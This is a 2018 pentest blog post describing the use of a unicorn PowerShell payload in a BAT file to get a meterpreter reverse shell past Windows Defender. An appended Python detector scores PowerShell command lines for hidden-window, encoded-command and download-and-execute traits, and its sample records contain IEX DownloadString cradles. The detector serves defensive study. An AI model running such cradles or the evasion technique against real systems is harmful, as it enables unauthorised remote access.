Monday, 24 December 2018

Pentesting AD - we the user

Last time we enumerated enough to be 'the user', so today we start from that point: we are the user, logged in. Here we go...
The main reason to write about it was that I found a cool idea to 'bypass' Windows Defender installed with Windows 10. I mean, I found it on GitHub ;) Kudos to the author!

Nothing new, but maybe you'll find it useful during your pentest(s) ;) Some details for my case:

(...as it was before: normally I would use RDP to connect to the target and 'add my disk' to the connection, so I could copy/paste my payload.exe/.ps1... but this time it wasn't possible, so...)

With Windows Defender enabled (by default, afaik) I wasn't able to run a meterpreter-based payload prepared with Metasploit.

I wasn't sure why (probably my mistake or a misunderstanding about this or that...), so I googled a bit and found a tool called unicorn:


I prepared a PowerShell payload with unicorn and saved it on the target machine in a BAT file:

And now we can see some results:

As you can see there is a green screen, so we are safe. ;]

After a few seconds there should be another nice screen:


...and now you are already connected (reverse shell), or the user clicks anything (OK/Cancel) and the revshell connects. No matter what, you should already have received the reverse shell.

I googled a bit more and found a cool idea (pretty similar to the one used in unicorn): web_delivery, described on the Offensive Security web page.

Checking:

Maybe you will find it useful too:


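From the defender's side, the unicorn and web_delivery one-liners this post relies on share a few command-line traits: a hidden window, an encoded command or a download-and-IEX cradle, and a launch from cmd.exe (the BAT file). The following added example is mine, not the post author's or the unicorn project's code; it scores constructed Sysmon-style process-creation records on those traits, and the patterns, weights and sample records are assumptions for illustration.

```python
import base64
import re

INDICATORS = {  # hypothetical patterns and weights chosen for this example; tune per environment
    "hidden_window": (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|/w\s+1\b"), 2),
    "no_profile": (re.compile(r"(?i)-nop(?:rofile)?\b"), 1),
    "encoded_command": (re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})"), 2),
    "download_cradle": (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b"), 3),
    "invoke_expression": (re.compile(r"(?i)\biex\b|invoke-expression"), 2),
}
ALERT_THRESHOLD = 4  # alert at or above this score

def decode_encoded_command(cmdline):  # decode -ec/-EncodedCommand (base64 of UTF-16LE) so the inner script is scanned too
    m = INDICATORS["encoded_command"][0].search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error (bad base64) is a ValueError subclass
        return ""

def score_event(event):  # returns (score, matched indicator names) for one process-creation event
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    text = event["CommandLine"] + "\n" + decode_encoded_command(event["CommandLine"])
    score, hits = 0, []
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(text):
            hits.append(name)
            score += weight
    if event["ParentImage"].lower().endswith("cmd.exe"):  # typical of a .bat launcher
        hits.append("parent_cmd")
        score += 1
    return score, hits

def find_alerts(events, threshold=ALERT_THRESHOLD):  # (ProcessId, score, hits) for events at/above threshold
    scored = ((e["ProcessId"], *score_event(e)) for e in events)
    return [a for a in scored if a[1] >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  # constructed records below, not from the post
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [  # Sysmon Event ID 1 style fields; 192.0.2.10 is a documentation address
    {"ProcessId": 1001, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"ProcessId": 1002, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.0.2.10:8080/x'))"},
    {"ProcessId": 1003, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -ec " + _ENCODED},
]
```

Running `find_alerts(SAMPLE_EVENTS)` flags the two cmd.exe-launched records and leaves the interactive Get-Process call alone; the weights are deliberately coarse, so treat them as a starting point for a real rule.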

Cheers
